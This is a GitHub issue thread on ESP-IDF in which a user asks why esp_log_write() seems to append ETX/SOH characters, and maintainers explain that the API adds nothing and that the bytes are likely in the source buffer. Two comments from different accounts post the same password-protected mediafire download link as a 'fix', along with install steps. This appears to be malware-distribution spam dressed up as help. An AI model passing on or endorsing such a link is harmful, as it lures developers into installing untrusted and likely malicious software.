espressif/esp-idf #14455: why use esp_log_write api printf data,the end of data will be append some character like  ‘ etx soh。I comfirm the oringinal data do not contain these character,this results to these character will append to the original data.

NormanLuo, 2024-08-28:
### Answers checklist.

- [X] I have read the documentation [ESP-IDF Programming Guide](https://docs.espressif.com/projects/esp-idf/en/latest/) and the issue is not addressed there.
- [X] I have updated my IDF branch (master or release) to the latest version and checked that the issue is present there.
- [X] I have searched the issue tracker for a similar issue and not found a similar issue.

### IDF version.

v4.4.3

### Espressif SoC revision.

ESP32

### Operating System used.

Windows

### How did you build your project?

Command line with Make

### If you are using Windows, please specify command line type.

None

### Development Kit.

ESP32

### Power Supply used.

External 3.3V

### What is the expected behavior?

I expected the original data will not be rewritted when use the api esp_log_write()

### What is the actual behavior?

use esp_log_write api printf data,the end of data will be append some character like  ‘ etx soh。I comfirm the oringinal data do not contain these character,this results to these character will append to the original data.

### Steps to reproduce.

1. use esp_log_write api to printf  the data which is more than 115 bytes
2. the end of data will be appendded some character like  ‘ 、etx or soh
3. finally,the original data will not be rewritted
...

### More Information.

[image]
[image]
[image]

NormanLuo, 2024-08-28:
please you excellent guys help me solve this problem

ViniciusSCG, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

NEKO-JOJUK, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

cristianfunes79, 2024-08-29:
Hi @NormanLuo could you please add more context? how are you using such api? it is possible that you have a non null terminated string and those are remaining characters in your buffer? is it possible to see the context if such function call? that api is not intended to be used directly, you can use LOG macros also.

KonstantinKondrashov, 2024-08-29:
Hi @NormanLuo!
The [`esp_log_write()`](https://github.com/espressif/esp-idf/blob/v4.4.3/components/log/log.c#L200) does not modify printed data. It outputs a log as it is, without appending any data front or end.
If you use the `ESP_LOGI` macro then the [`LOG_FORMAT` ](https://github.com/espressif/esp-idf/blob/v4.4.3/components/log/include/esp_log.h#L293) macro forms the final format string (it appends log letter, time, color, \n). 
The chain of calls is `ESP_LOGI`->`esp_log_write`.

```c
#define LOG_RESET_COLOR   "\033[0m"
```
`\033` -> 0x1B

I think that ETX and SOH symbols are present in the original string because the log APIs and log macros do not add such characters.
- Start of Heading (SOH) 0x01
- End of Tex (ETX) 0x03

KonstantinKondrashov, 2024-09-06:
I'll close this issue, but if you have any further questions, feel free to reopen it. Thanks!

closed 2024-09-06 by KonstantinKondrashov